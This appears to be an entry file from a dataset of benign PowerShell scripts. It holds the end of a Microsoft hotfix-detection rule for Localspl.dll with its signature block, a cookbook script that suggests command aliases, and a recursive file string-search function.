7601) -and ($fileVersionInfo.FilePrivatePart.ToString().StartsWith("21"))) { $filePrivatePartVersion=21921 $requiredVersion='6.1.7601.21921' } if (-not(CheckMinimalFileVersion $file 6 1 $OSVersion.Build $filePrivatePartVersion)) { add-member -inputobject $InformationCollected -membertype noteproperty -name "Localspl.dll current version" -value (Get-FileVersionString($file)) add-member -inputobject $InformationCollected -membertype noteproperty -name "Localspl.dll required version" -value $requiredVersion return $false } } return $true } # ************** # Detection Logic # ************** #Check to see if rule is applicable to this computer if (AppliesToSystem) { $RuleApplicable = $true if (-not (CheckHotfixInstalled)) { $RootCauseDetected = $true } } # ********************* # Root Cause processing # ********************* if ($RuleApplicable) { if ($RootCauseDetected) { # Red/ Yellow Light Update-DiagRootCause -id $RootCauseName -Detected $true Write-GenericMessage -RootCauseId $RootCauseName -PublicContentURL $PublicContent -InformationCollected $InformationCollected -Verbosity $Verbosity -Visibility $Visibility -SupportTopicsID $SupportTopicsID -InternalContentURL $InternalContent -SolutionTitle $Title } else { # Green Light Update-DiagRootCause -id $RootCauseName -Detected $false } } # SIG # Begin signature block # MIIoVQYJKoZIhvcNAQcCoIIoRjCCKEICAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAFYwY2j/F0c8no # QjvLG556Fhw8ebyprgyc4hX6lLzv96CCDYUwggYDMIID66ADAgECAhMzAAAEA73V # lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV # LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY # oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi # kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/ # /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv # ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw # VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh # dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW # gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v # d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw # MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov # L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx # XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB # AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r # EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV # NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC # rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos # oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB # +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO # raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+ # sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W # +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s # IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu # iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK # YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm # aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw # OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE # BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD # VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG # 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la # UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc # 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D # dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+ # lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk # kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6 # A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd # X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL # 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd # sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3 # T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS # 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI # bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL # BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD # uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv # c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf # MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF # BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h # cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA # YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn # 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7 # v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b # pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/ # KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy # CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp # mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi # hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb # BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS # oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL # gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX # cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4x # CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt # b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p # Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA # BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw # HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIkz # la+bRK2BGqMSAJarDbkiTx3LO60LPcLffMObE/FWMEIGCisGAQQBgjcCAQwxNDAy # oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20wDQYJKoZIhvcNAQEBBQAEggEAluwbgbMCMG7Rjw77eA/w+EdZ7s+mgNayhVbY # xGlHPH0DnznFx4J13sxWIFp7AZdGopVX636rHYmL7kMB1EN3vGlKCzNys5bT+CfJ # yNe7H21lKi81do9D6tY21xak63ZxEGagLXvgmTq91JPy+Ttz0gcX+IOBPKK0GChh # y7QgOYftnb2Jp46ydxweLpIOOuNXoakSemnR/oPr9ZDQ3DV2iIhjm8DgGDtxpV5D # TBpd0PdlHt5g2UbU9FcwEd5VwIncH+V0FZ1LuZeh6EEzE0ngK9U3TidtTanrQv3j # ujfrQbiNpPVfnlTxZ6o4ME+t4kpkm6icirkSOO1uq122h2Vwu6GCF7AwghesBgor # BgEEAYI3AwMBMYIXnDCCF5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZI # AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE # WQoDATAxMA0GCWCGSAFlAwQCAQUABCBrFikn94kx8awtvftzosQmpUWJduiPIyIA # pc+gIA3XFAIGZutZ6YIxGBMyMDI0MTAyODExNDA0MS43MDdaMASAAgH0oIHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjo1MjFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAACAAvX # qn8bKhdWAAEAAAIAMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w # IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzEyMVoXDTI1MTAyMjE4MzEyMVowgdMxCzAJ # BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k # MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv # c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs # ZCBUU1MgRVNOOjUyMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt # ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA # r1XaadKkP2TkunoTF573/tF7KJM9Doiv3ccv26mqnUhmv2DM59ikET4WnRfo5biF # IHc6LqrIeqCgT9fT/Gks5VKO90ZQW2avh/PMHnl0kZfX/I5zdVooXHbdUUkPiZfN # XszWswmL9UlWo8mzyv9Lp9TAtw/oXOYTAxdYSqOB5Uzz1Q3A8uCpNlumQNDJGDY6 # cSn0MlYukXklArChq6l+KYrl6r/WnOqXSknABpggSsJ33oL3onmDiN9YUApZwjnN # h9M6kDaneSz78/YtD/2pGpx9/LXELoazEUFxhyg4KdmoWGNYwdR7/id81geOER69 # l5dJv71S/mH+Lxb6L692n8uEmAVw6fVvE+c8wjgYZblZCNPAynCnDduRLdk1jswC # qjqNc3X/WIzA7GGs4HUS4YIrAUx8H2A94vDNiA8AWa7Z/HSwTCyIgeVbldXYM2Bt # xMKq3kneRoT27NQ7Y7n8ZTaAje7Blfju83spGP/QWYNZ1wYzYVGRyOpdA8Wmxq5V # 8f5r4HaG9zPcykOyJpRZy+V3RGighFmsCJXAcMziO76HinwCIjImnCFKGJ/IbLjH # 6J7fJXqRPbg+H6rYLZ8XBpmXBFH4PTakZVYxB/P+EQbL5LNw0ZIM+eufxCljV4O+ # nHkM+zgSx8+07BVZPBKslooebsmhIcBO0779kehciYMCAwEAAaOCAUkwggFFMB0G # A1UdDgQWBBSAJSTavgkjKqge5xQOXn35fXd3OjAfBgNVHSMEGDAWgBSfpxVdAF5i # XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv # c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB # JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw # Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp # bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud # JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF # AAOCAgEAKPCG9njRtIqQ+fuECgxzWMsQOI3HvW7sV9PmEWCCOWlTuGCIzNi3ibdL # ZS0b2IDHg0yLrtdVuBi3FxVdesIXuzYyofIe/alTBdV4DhijLTXtB7NgOno7G12i # O3t6jy1hPSquzGLry/2mEZBwIsSoS2D+H+3HCJxPDyhzMFqP+plltPACB/QNwZ7q # +HGyZv3v8et+rQYg8sF3PTuWeDg3dR/zk1NawJ/dfFCDYlWNeCBCLvNPQBceMYXF # RFKhcSUws7mFdIDDhZpxqyIKD2WDwFyNIGEezn+nd4kXRupeNEx+eSpJXylRD+1d # 45hb6PzOIF7BkcPtRtFW2wXgkjLqtTWWlBkvzl2uNfYJ3CPZVaDyMDaaXgO+H6Di # rsJ4IG9ikId941+mWDejkj5aYn9QN6ROfo/HNHg1timwpFoUivqAFu6irWZFw5V+ # yLr8FLc7nbMa2lFSixzu96zdnDsPImz0c6StbYyhKSlM3uDRi9UWydSKqnEbtJ6M # k+YuxvzprkuWQJYWfpPvug+wTnioykVwc0yRVcsd4xMznnnRtZDGMSUEl9tMVneb # YRshwZIyJTsBgLZmHM7q2TFK/X9944SkIqyY22AcuLe0GqoNfASCIcZtzbZ/zP4l # T2/N0pDbn2ffAzjZkhI+Qrqr983mQZWwZdr3Tk1MYElDThz2D0MwggdxMIIFWaAD # AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD # VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe # MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv # ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy # MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo # aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y # cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw # MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5 # vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64 # NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu # je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl # 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg # yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I # 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2 # ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/ # TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy # 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y # 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H # XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB # AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW # BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B # ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz # L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB # BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB # Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL # oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv # TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr # BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS # b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq # reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27 # DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv # vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak # vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK # NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2 # kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+ # c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep # 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk # txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg # DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/ # 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHW # MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL # EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT # Hm5TaGllbGQgVFNTIEVTTjo1MjFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z # b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAjJOfLZb3ivip # L3sSLlWFbLrWjmSggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz # aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv # cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx # MDANBgkqhkiG9w0BAQsFAAIFAOrJ6QUwIhgPMjAyNDEwMjgxMDQyMTNaGA8yMDI0 # MTAyOTEwNDIxM1owdzA9BgorBgEEAYRZCgQBMS8wLTAKAgUA6snpBQIBADAKAgEA # AgIa1wIB/zAHAgEAAgITPjAKAgUA6ss6hQIBADA2BgorBgEEAYRZCgQCMSgwJjAM # BgorBgEEAYRZCgMCoAowCAIBAAIDB6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEB # CwUAA4IBAQAb6NwhJU6AqC9y7uh2hreA2bMAlUuzSXcR6GPun/rHgrgfQTe4RBRr # /jfnUT+KQlJtxfDU/IHDXlRFv0FVU5U7cety3IMK0/IZ1ahLcCNSLoMvMnyiTjO3 # qKyN4MEFl3yXKar4dOwpuXIc6RDKvk90wK2dB5N/J0xbq7DWoizimYbYj0s0Eb/3 # 9OIVKvzQ2C32cLh8WRrg+s29DIGtm6yPrp1YUMXeXEBzc765thUReieMSIXpuMhk # wVuch5mEOYFv2ftoL3lD4CGRFEwUHwwt1rgfRwyWQ+pn3ZXRAA+1v5iEzjN81+VP # 8zAakq6wB0hFJ6xpVsYTxo1Q4u6bJqYJMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UE # BhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc # BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0 # IFRpbWUtU3RhbXAgUENBIDIwMTACEzMAAAIAC9eqfxsqF1YAAQAAAgAwDQYJYIZI # AWUDBAIBBQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG # 9w0BCQQxIgQg4xNBQ4ZOaARUeMrgh2COv9O9yChfjtauC8Of3vQt+4MwgfoGCyqG # SIb3DQEJEAIvMYHqMIHnMIHkMIG9BCDUyO3sNZ3burBNDGUCV4NfM2gH4aWuRudI # k/9KAk/ZJzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5n # dG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9y # YXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMz # AAACAAvXqn8bKhdWAAEAAAIAMCIEIL1IrqDou+p7PvcuEWcaTRFbuM53lAEMQcad # RIs4/Ph4MA0GCSqGSIb3DQEBCwUABIICAC+tWClhuzyL5KASHN8L0zRvEwG3JblA # Jh1aNC7/zbXKaIIfj6haC1kdCAyeptDRn5ILNB6rrFN1gC5YjXLIs5tl6xvAyaMk # eqL18tgNRGMBLRqDyyBrTPWyEbt2eJ1QyFyURDPU3rihNVn2IT2JhViWXRiYMtqT # 5dRTtjTJRDUaCXQ0W4xk77JT3UG67GmiBgcSBO+FqKaLjo4it0KlX4+TVxLdgc28 # 6ivkmR3kWHvv5tkrFGNhylvqbcdWDY5tLcM/VxQ0i2MWshBoO3ZqNElZkCAtUFrJ # GRMKPZVu9WC+Avanzb8MizRZSzaaagy/5w718YCRHQRNdq+8Sm7xlUUFXGmUrK57 # yXiG0z2hngFsbjoihi63diJHMPfNSOnXK5nh/BBqjii29vJ1ACQfIohOf9USTC04 # j4dixLYYtdol5ZftTILQtPDn1xogqX1A7h5RRAvF9iMqpmUiiKHyf0AbPIdLYS7W # C+lwt6UjqIRpQd7Fb3Ogc1HDE8HhkP8spaeUK0qOQ7y87qZWuzRBxQDuPceKKGbU # sh70g++q4GttiFXntHrOosoHAF8fqqtbZwcw1CODyCH6j6K8l4nLrgiyoez37zKH # 33qd7JqzAOp7QOR4zXezze4EG3lau9n/fzaiLCAevsBvGNFtkw2eQ4VCpoVY/EuI # Wu2BQ4BbexAG # SIG # End signature block
combined_dataset/train/non-malicious/Get-AliasSuggestion.ps1
Get-AliasSuggestion.ps1
##############################################################################\n##\n## Get-AliasSuggestion\n##\n## From Windows PowerShell Cookbook (O'Reilly)\n## by Lee Holmes (http://www.leeholmes.com/guide)\n##\n##############################################################################\n\n<#\n\n.SYNOPSIS\n\nGet an alias suggestion from the full text of the last command. Intended to\nbe added to your prompt function to help learn aliases for commands.\n\n.EXAMPLE\n\nGet-AliasSuggestion Remove-ItemProperty\nSuggestion: An alias for Remove-ItemProperty is rp\n\n#>\n\nparam(\n ## The full text of the last command\n $LastCommand\n)\n\nSet-StrictMode -Version Latest\n\n$helpMatches = @()\n\n## Find all of the commands in their last input\n$tokens = [Management.Automation.PSParser]::Tokenize(\n $lastCommand, [ref] $null)\n$commands = $tokens | Where-Object { $_.Type -eq "Command" }\n\n## Go through each command\nforeach($command in $commands)\n{\n ## Get the alias suggestions\n foreach($alias in Get-Alias -Definition $command.Content)\n {\n $helpMatches += "Suggestion: An alias for " +\n "$($alias.Definition) is $($alias.Name)"\n }\n}\n\n$helpMatches
combined_dataset/train/non-malicious/3121.ps1
3121.ps1
function Find-StringInFile { [CmdletBinding()] param( [Parameter( Position=0, Mandatory=$true, HelpMessage="String to find")] [String]$Search, [Parameter( Position=1, HelpMessage="Folder where the files are stored (search is recursive)")] [ValidateScript({ if(Test-Path -Path $_) { return $true } else { throw "Enter a valid path!" } })] [String]$Path = (Get-Location), [Parameter( Position=2, HelpMessage="String must be case sensitive (Default=false)")] [switch]$CaseSensitive ) Begin{ } Process{ $Strings = Get-ChildItem -Path $Path -Recurse | Select-String -Pattern ([regex]::Escape($Search)) -CaseSensitive:$CaseSensitive | Group-Object -Property Path foreach($String in $Strings) { $IsBinary = Test-IsFileBinary -FilePath $String.Name foreach($Group in $String.Group) { [pscustomobject] @{ Filename = $Group.Filename Path = $Group.Path LineNumber = $Group.LineNumber IsBinary = $IsBinary Matches = $Group.Matches } } } } End{ } }
